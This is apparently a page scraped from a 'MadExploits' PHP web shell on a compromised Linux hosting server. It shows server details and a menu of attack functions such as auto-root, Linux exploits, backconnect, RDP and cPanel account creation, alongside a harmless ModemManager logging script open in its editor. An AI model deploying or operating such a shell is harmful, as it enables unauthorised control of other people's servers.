Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
ModemManager /
connection.available.d /
[ HOME SHELL ]
Name
Size
Permission
Action
99-log-event
494
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 99-log-event
#!/bin/sh # SPDX-License-Identifier: CC0-1.0 # 2022 Aleksander Morgado <aleksander@aleksander.es> # # Example connection info dispatcher script # # require program name and at least 4 arguments [ $# -lt 4 ] && exit 1 MODEM_PATH="$1" BEARER_PATH="$2" INTERFACE="$3" STATE="$4" MODEM_ID=$(basename ${MODEM_PATH}) BEARER_ID=$(basename ${BEARER_PATH}) # report in syslog the event logger -t "connection-dispatch" "modem${MODEM_ID}: bearer${BEARER_ID}: interface ${INTERFACE} ${STATE}" exit $?
Close